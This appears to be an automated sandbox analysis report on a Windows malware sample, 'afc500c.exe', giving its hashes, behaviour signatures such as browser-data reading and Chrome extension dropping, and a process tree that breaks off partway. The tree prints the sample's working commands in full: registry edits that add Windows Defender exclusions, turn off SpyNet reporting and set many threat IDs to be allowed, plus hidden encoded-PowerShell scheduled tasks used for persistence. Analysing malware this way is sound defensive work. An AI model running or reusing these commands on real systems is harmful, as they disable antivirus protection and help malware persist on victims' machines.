Analysis

  • max time kernel
    129s
  • max time network
    140s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12/03/2025, 18:44

General

  • Target

    afc500c.exe

  • Size

    7.3MB

  • MD5

    63926a5ec17e0838207346060ea15fec

  • SHA1

    d30179fb24c18f9d49202f5110d38ed7967fa836

  • SHA256

    67c3aedc80696d9f2bf64ec4a4c7c461605d54f169f83babdc8b90993afc500c

  • SHA512

    f0827e23038ad4fc22a0d88c2a8f466638cbb6447538f88bc8eef61b9ca585ecde215cc9c5287fc560cfc7adcb470aa312395dcad9f78e036a4769dd29ea6e48

  • SSDEEP

    196608:91O6DEFZUlN3lPS0XJjoF0Kx0iroV8H6RrzJFAkN:3OAEFZmVqBFV0iroOH6RrHAkN

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Indirect Command Execution 1 TTPs 2 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 1 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Drops file in System32 directory 27 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 11 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 44 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\afc500c.exe
    "C:\Users\Admin\AppData\Local\Temp\afc500c.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4516
    • C:\Users\Admin\AppData\Local\Temp\7zSBF58.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4248
      • C:\Users\Admin\AppData\Local\Temp\7zSC311.tmp\Install.exe
        .\Install.exe /S /site_id "525403"
        3⤵
        • Checks BIOS information in registry
        • Checks computer location settings
        • Executes dropped EXE
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:640
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
          4⤵
          • Indirect Command Execution
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2752
          • C:\Windows\SysWOW64\cmd.exe
            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3000
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
              6⤵
                PID:5040
              • \??\c:\windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                6⤵
                  PID:556
            • C:\Windows\SysWOW64\forfiles.exe
              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
              4⤵
              • Indirect Command Execution
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:3864
              • C:\Windows\SysWOW64\cmd.exe
                /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                5⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:1160
                • \??\c:\windows\SysWOW64\reg.exe
                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                  6⤵
                  • System Location Discovery: System Language Discovery
                  PID:2340
                • \??\c:\windows\SysWOW64\reg.exe
                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                  6⤵
                  • System Location Discovery: System Language Discovery
                  PID:368
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /CREATE /TN "gMutiZUWw" /SC once /ST 10:45:58 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
              4⤵
              • System Location Discovery: System Language Discovery
              • Scheduled Task/Job: Scheduled Task
              PID:1276
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /run /I /tn "gMutiZUWw"
              4⤵
              • System Location Discovery: System Language Discovery
              PID:2388
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /DELETE /F /TN "gMutiZUWw"
              4⤵
              • System Location Discovery: System Language Discovery
              PID:3964
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /CREATE /TN "bIqjSKjLtvGhSJBNfA" /SC once /ST 18:46:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\OBIEeKtMHilfBZfce\dWLAMXehBrRmAUd\XgCYUjF.exe\" ik /site_id 525403 /S" /V1 /F
              4⤵
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              • Scheduled Task/Job: Scheduled Task
              PID:1980
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
        1⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1508
        • C:\Windows\system32\gpupdate.exe
          "C:\Windows\system32\gpupdate.exe" /force
          2⤵
            PID:2480
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
          1⤵
            PID:4004
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
            1⤵
              PID:3020
            • C:\Windows\system32\gpscript.exe
              gpscript.exe /RefreshSystemParam
              1⤵
                PID:1920
              • C:\Users\Admin\AppData\Local\Temp\OBIEeKtMHilfBZfce\dWLAMXehBrRmAUd\XgCYUjF.exe
                C:\Users\Admin\AppData\Local\Temp\OBIEeKtMHilfBZfce\dWLAMXehBrRmAUd\XgCYUjF.exe ik /site_id 525403 /S
                1⤵
                • Executes dropped EXE
                • Drops file in System32 directory
                • Suspicious use of WriteProcessMemory
                PID:4704
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                  2⤵
                  • Drops file in System32 directory
                  • System Location Discovery: System Language Discovery
                  • Modifies data under HKEY_USERS
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:2856
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                    3⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:1564
                    • C:\Windows\SysWOW64\reg.exe
                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                      4⤵
                        PID:4708
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                      3⤵
                        PID:1588
                      • C:\Windows\SysWOW64\reg.exe
                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:4592
                      • C:\Windows\SysWOW64\reg.exe
                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                        3⤵
                          PID:3336
                        • C:\Windows\SysWOW64\reg.exe
                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                          3⤵
                            PID:1324
                          • C:\Windows\SysWOW64\reg.exe
                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                            3⤵
                              PID:1700
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:3256
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:4428
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                              3⤵
                                PID:4008
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:4372
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                3⤵
                                  PID:3472
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:720
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                  3⤵
                                    PID:2968
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                    3⤵
                                      PID:4504
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                      3⤵
                                        PID:3064
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:3048
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:452
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:2484
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                        3⤵
                                          PID:1112
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:5008
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                          3⤵
                                            PID:4564
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:3600
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                            3⤵
                                              PID:1780
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                              3⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:4600
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                              3⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:1560
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                              3⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:4192
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                              3⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:2496
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                              3⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:1864
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CbVqBnigU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CbVqBnigU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LfKWeIlHqQBU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LfKWeIlHqQBU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ardKySDqUVkhC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ardKySDqUVkhC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dIcdGsFSuyUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dIcdGsFSuyUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xQNizQXsNpkyKPuIghR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xQNizQXsNpkyKPuIghR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\TUiypwAeSPRUPoVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\TUiypwAeSPRUPoVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\OBIEeKtMHilfBZfce\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\OBIEeKtMHilfBZfce\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\dwSOvWKysCpEXQRJ\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\dwSOvWKysCpEXQRJ\" /t REG_DWORD /d 0 /reg:64;"
                                            2⤵
                                            • Drops file in System32 directory
                                            • Modifies data under HKEY_USERS
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1940
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CbVqBnigU" /t REG_DWORD /d 0 /reg:32
                                              3⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:632
                                              • C:\Windows\SysWOW64\reg.exe
                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CbVqBnigU" /t REG_DWORD /d 0 /reg:32
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:3196
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CbVqBnigU" /t REG_DWORD /d 0 /reg:64
                                              3⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:232
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LfKWeIlHqQBU2" /t REG_DWORD /d 0 /reg:32
                                              3⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:1800
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LfKWeIlHqQBU2" /t REG_DWORD /d 0 /reg:64
                                              3⤵
                                                PID:4820
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ardKySDqUVkhC" /t REG_DWORD /d 0 /reg:32
                                                3⤵
                                                  PID:2480
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ardKySDqUVkhC" /t REG_DWORD /d 0 /reg:64
                                                  3⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:1944
                                                • C:\Windows\SysWOW64\reg.exe
